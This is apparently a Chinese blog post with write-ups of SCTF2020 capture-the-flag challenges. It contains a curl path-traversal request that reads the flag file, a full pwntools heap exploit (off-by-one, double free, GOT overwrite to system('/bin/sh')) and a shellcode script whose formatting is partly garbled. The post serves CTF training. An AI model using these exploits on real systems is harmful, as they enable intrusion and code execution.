SCTF2020

最新推荐文章于 2024-05-13 11:45:19 发布
最新推荐文章于 2024-05-13 11:45:19 发布
阅读量1.5k 收藏
点赞数
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/107141691
版权

bestlanguage

有大师傅发现了直接读取~~

#root@iZ8vb0cjzcdx977svsnmimZ:~/web# curl --path-as-is http://39.104.93.188/index.php/tmp/../../flag
SCTF{B3st_1angu4g3_F0r_Uohhhhhhhhhh1l1l1}root@iZ8vb0cjzcdx977svsnmimZ:~/web#

Snake

在输入的地方有一次off by one的机会通过构造堆块重叠然后做2次double free改写got拿到shell
exp:

from pwn import *
p=remote('39.107.244.116',9999)
#p=process('./snake')
elf=ELF('./snake')
libc=elf.libc

def add(idx,size,data):
	p.sendlineafter('name','1')
	p.sendlineafter('?',str(idx))
	p.sendlineafter('?',str(size))
	p.sendafter('?',data)

def delete(idx):
	p.sendlineafter('name','2')
	p.sendlineafter('?',str(idx))

def get_name(idx):
	p.sendlineafter('name','3')
	p.sendlineafter('?',str(idx))

def start_game():
	p.sendlineafter('name','4')

def if_exit(bol):
	p.sendlineafter('exit?',bol)

p.sendlineafter('?',str(0x30))
p.sendafter('name','doudou')
for i in range(36):
	p.send('\n')
p.sendafter('words:','a'*(0x4d-9)+p64(0)+'\xa1')
if_exit('n')
add(1,0x50,'aaaa')#0x602ffa
add(2,0x58,'aaaa')
add(3,0x50,'aaaa')
add(4,0x28,'aaaa')
delete(0)
add(0,0x30,'aaa')
add(5,0x50,'bbb')#5=2
delete(1)
delete(3)
delete(5)
add(1,0x50,p64(0x602ffa))
add(3,0x50,'aaa')
add(5,0x50,'bbb')
add(6,0x50,'\x11'*0xe)
get_name(6)
start_game()
for i in range(36):
	p.send('\n')
#sleep(2)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['free']
log.success('libcbase: '+hex(libcbase))
system=libcbase+libc.sym['system']
if_exit('n')
delete(1)
delete(3)
delete(5)
add(1,0x50,p64(0x602ffa))
add(3,0x50,'aaa')
add(5,0x50,'/bin/sh\x00')
add(7,0x50,'a'*0xe+p64(system))
delete(5)
#p.sendafter('words:','a'*(0x4d-9)+p64(0)+'\xa1')
p.interactive()
print hex(libcbase)

Dou dizhu

这个题目地主赢了就有flag
直接开3个浏览器 一起玩硬拿flag

Can you hear

在ctf.show上面好像有相同的使用msstv工具

Coolcode

漏洞点是在申请堆块的时候会得到一个指针可能会把指针写到got表上面通过调用函数来调用shellcode但是shellcode需要shuzi和字母且长度有限制在比赛时未绕过等赛后观摩wp

from  pwn  import  *
context.log_level  =  "debug"
context.arch  =  'amd64'
elf  =  ELF("demo")
local  =  0
if  local:
p  =  process("./CoolCode")
else:
p  =  remote("39.107.119.192",  9999)

 
def  db():
gdb.attach(p,  'b  delete')
def  choose(num):
p.sendlineafter("Your  choice  :",  str(num))
def  add(idx,  mes):
choose(1)
p.sendlineafter("Index:  ",  str(idx))
p.sendafter("messages:  ",  mes)
def  show(idx):
choose(2)
p.sendlineafter("Index:  ",  str(idx))
def  delete(idx):
choose(3)
p.sendlineafter("Index:  ",  str(idx))
chunk_list  =  0x602140
add(-37,  "SX"+"RXWZ"+"4S0BD"+"SX4045"+"0BC"+"48420BB"+"XXX"  +"UX")
#db()
'''
push
pop
rsp
rdx
xor
esi,  DWORD  PTR  [edx]
push
pop
rdx
rax
xor
edi,  DWORD  PTR  [eax]
push
pop
rbx
rax
xor
push
pop
al,0x5A
rax
rdx
push
pop
rbp
rax
push
'''
rsi
add(0,
add(1,
#db()
"TZ"+"32"+"RX"+"38"+"SX"+"4Z"+"PZ"+"UX")
"RZ"*7+"VVWX")#----
delete(0)
shellcode_mmap  =  '''
/*mmap(0x40000000,0x100,7,34,0,0)*/
push  0x40000000  /*set  rdi*/
pop  rdi
push  0x100  /*set  rsi*/
pop  rsi
push  7  /*set  rdx*/

 
pop  rdx
push  0x22  /*set  rcx*/
pop  r10
push  0  /*set  r8*/
pop  r8
push  0  /*set  r9*/
pop  r9
push  0x9
pop  rax
syscall/*syscall*/
push  rdi
pop  rsi
push  0
pop  rax
push  0x100
pop  rdx
push  0
pop  rdi
syscall
push  rsi
ret
'''
p.sendline(asm(shellcode_mmap))
payload  =  '''
push  0x23
push  0x4000000b
pop  rax
push  rax
retfq
'''
open_shellcode  =  '''
mov  esp,  0x40000100
xor  ecx,ecx
xor  edx,edx
mov  eax,0x5
push  0x67616c66
mov  ebx,esp
int  0x80
mov  ecx,eax
'''
ret_64  =  '''
push  0x33
push  0x40000030
retfq
nop
nop
nop
nop
nop
nop

 
'''
read_shellcode  =  '''
push  0x3;
pop  rdi;
push  0x0;
pop  rax;
push  0x40000200
pop  rsi;
push  0x100;
pop  rdx;
syscall;
'''
write_shellcode  =  '''
push  0x1
pop  rdi
push  0x1
pop  rax
syscall
'''
#db()
raw_input("write  flag")
p.sendline(asm(payload)+asm(open_shellcode)+asm(ret_64)+asm(read_shellcode)+asm
(write_shellcode))
p.interactive()
doudoudedi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SCTF2020 官方Write-up.pdf
07-08
SCTF的官方wp!SCTF的官方wp!如有侵权请私信撤回谢谢。
sctf
zhang14916的博客
06-26 1640
1.warmup 阅读源码,我们发现整个加密流程如下—对明文长度使用pad()填充至长度为16的倍数,然后将msg分成长度为16 的n段,将n段明文做异或得到一段长度为16的明文,然后使用aes_cbc模式加密得到密文。在题目中已经给出了明文'see you at three o\'clock tomorrow'和它的密文,题目要求我们输入“please send me your flag”使用...
【网络安全 Misc】明文攻击 ACTF2020_ctf 已知明文攻击
最新发布
2401_84968248的博客
05-13 279
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
[BMZCTF-pwn] 41-sctf2020-coolcode
weixin_52640415的博客
02-20 536
又到不会区了,搜出来复现一下,学习学习 unsigned __int64 m1add() { int v1; // [rsp+Ch] [rbp-14h] BYREF void *s; // [rsp+10h] [rbp-10h] unsigned __int64 v3; // [rsp+18h] [rbp-8h] v3 = __readfsqword(0x28u); v1 = 0; printf("Index: "); __isoc99_scanf("%d", &v
[SCTF2020]CloudDisk
xiaoyue2019的博客
07-20 1435
又来水文章了 十几天前的比赛,今天没blog写,来复现下web签到题。 clone官方wp&docker环境 docker build -t sctf/clouddisk . docker run -d -p 8090:3333 2f2 使用当前目录的dockerfile提取镜像,tag叫做sctf/clouddisk 后台创建新容器并制定映射端口为8090 +上题目给的一段源码: const fs = require('fs'); const path = require('path')
2020SCTF——PWN snake
baidu_36110484的博客
07-15 370
0x00 背景 今年SCTF上的一道PWN题,难度还行,关键是要大概读懂程序,找到可利用的漏洞。由于比赛环境使用的是libc2.23,我为了复现也搞了一个ubuntu16.04的虚拟机(也是libc2.23)。这样搞fastbin利用比较方便。最后在libc的小版本上还是有一点出入,不过,问题不大。 0x01 源码分析 while ( 1 ) { v10 = 0; v13 = 60; v14 = 4; v11 = 0; v12 = 1; dword_603
SCTF2020:SCTF2020
04-01
SCTF2020:一场聚焦Java技术的网络安全挑战】 SCTF2020,全称为“SCTF2020网络安全技术挑战赛”,是一个专注于信息技术安全领域的年度竞赛,尤其强调了Java技术的应用。这个比赛旨在检验参赛者在Java编程、网络...
SCTF差分晶振15013896510
06-21
SCTF差分晶振15013896510 SCTF差分晶振15013896510是一款差分晶振器件,提供了高频率稳定性和低抖动特性,适用于高速应用场景。 电气参数: * 频率:106.25、125、155.52、161.1328、187.5、312.5MHz * 频率稳定...
sctf2014 misc400b.rar
09-30
sctf2014 misc400b.rar
java版sm4源码-SCTF2019-Write-Up:SCTF2019报道
06-04
SCTF 2019 官方 Write-Up Misc 签到 出题人: XXX 解题人数: 260 最终分数:71 [removed]/9j/4QBkRXhpZgAATU0AKgAAAAgABYdp... 给了个图片的base64编码,某些浏览器可能渲染会截断,本来想放hint提示浏览器问题,但是...
redpwnCTF 2020 pwn部分writeup
SkYe's Blog
06-25 826
coffer-overflow-0 分析 保护情况 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 漏洞函数 题目给了程序源代码,但是我们还是按照正常题目做法分析二进制文件。 漏洞就在 main 中,gets 函数存在栈溢出: int __cdecl main(int argc, const char **
2020 SCTF 部分WriteUp
Hk_Mayfly的博客
07-06 1479
signin 准备 signin.exe:https://wwa.lanzous.com/inIQdec11zi 程序分析 可以判断出,这个程序实际上是由Python打包成的可执行文件,且在运行这个程序时,在同目录下产生了一个tmp.dll文件,猜测是程序调用某些函数的接口。 反编译 使用archive_viewer.py反编译为字节码文件 python archive_v...
SCTF2020】signin WriteUp
古月浪子的博客
07-06 1010
一道SCTF的逆向题,做了很久很久才做起,唉…  下载附件,打开发现是一个GUI程序  IDA打开,根据经验分析出这是一个pyqt程序,于是用解包脚本处理这个exe 脚本Github:pyinstxtractor 执行脚本后得到了一个解包后的文件夹 在这里我们重点关注main和struct文件 用WinHex打开,发现main其实是一个没有pyc文件头的pyc文件,而struct中有文件头 于是我们把struct的前16个字节添加到main的最前面,并改名为main.pyc,得到如下文
SCTF | 三足鼎立焦点对抗,天枢战队有惊无险斩获冠军头衔
Cyberpeace的博客
12-29 2567
​​2021年12月27日9:00,第七届XCTF国际网络攻防联赛分站赛SCTF 2021顺利落幕。本场赛事由XCTF国际联赛主办,成都信息工程大学Syclover战队组织,赛宁网安提供技术支持。 来自全球的67个国家和地区、419支队伍、1536人次共赴赛事,赶在2022年钟声敲响之前,为今年最后一场CTF盛宴画上圆满句号。 SCTF 2021是XCTF国际联赛与Syclover战队的第五次合作。此次赛事,三叶草小组将自己对CTF的理解融入赛题,大胆尝试,在Pwn赛题首次设置开放性新玩法,旨在模拟真实环境
SCTF2020】get_up WriteUp
古月浪子的博客
07-06 549
一道SCTF的逆向题,做了很久很久才做起,唉… IDA打开,用shift+f12查找出现的字符串,再通过x交叉引用定位到主函数 根据伪代码,大概是判断我们输入的一个长度小于等于6的字符串,跟进判断函数看一看 看到32位的a-f+0-9的字符串,盲猜哈希,又因为输入的长度小于等于6,肯定能爆破出来,于是丢到cmd5网站上,解出来“sycsyc” 成功绕过第一个判断以后,下面的代码大致意思是查找.reioc段并且改为可写,然后用刚刚输入的字符串进行异或,这里用IDCPython脚本处理一下 可以看到处
SCTF-RSA-WP
luoluopeach
07-09 944
这道题的类型我第一次遇到,主要也接触到sage和LLL算法(学密码数学真的很重要) nc 121.199.14.145 12345得到三组e,n,c e0=0x1589b1732d8ce5aedf1e34a63a14bac68dcc11ee18b94e293efe58c2b77d055db463503a039472eff881b504b90e6bec1c90da3efb02c6b94770ada0a921eb5e9d19a4ca1d26b47cbaee855b72da5a79a9acb675e48c4614
sctf2014 小结
Ee1s
12-17 1402
不得不说sctf含金量相当的高。。果断被残虐。。。 签到题不用多说这里只想说一下我冥思苦想的misc300 看到icmp之后有类似入侵的包,果断查看了一下,发现了ASCpwd和unioncodpwd... 其实看到密码真不知道怎么做,因为也不是md5,也不是古典密码算法,估计是hash。。 用彩虹表爆破ascpwd了。。 得出的结果不对。。。
2020 Zh3r0 部分WP
Hk_Mayfly的博客
06-19 333
测试文件:https://wwa.lanzous.com/iEIHddtrkwb crypto RSA-Warmup 就是一个简单的RSA解密 import gmpy2 import rsa from Crypto.Util.number import long_to_bytes e = 65537 n = 41049891753792030326026671910957...
SCTF2023复现(部分web复现)
leekos的博客,分享web安全相关知识~
06-27 1016
以下命令可以找到正在系统上运行的所有SUID可执行文件。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Xu7woghW-1687831317765)(null)][外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pe8DGg3N-1687831317538)(null)][外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sAXA9jrN-1687831319189)(null)]
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ``` 对于 CentOS 或 RHEL 系统: ``` sudo yum install libstdc++.so.6 ``` 请注意,根据你使用的操作系统和软件包管理器,命令可能会有所不同。确保你的系统上已经安装了适当的软件包管理器,并根据你的情况进行相应的调整。如果问题仍然存在,请提供更多的上下文信息,以便我可以提供更具体的解决方案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值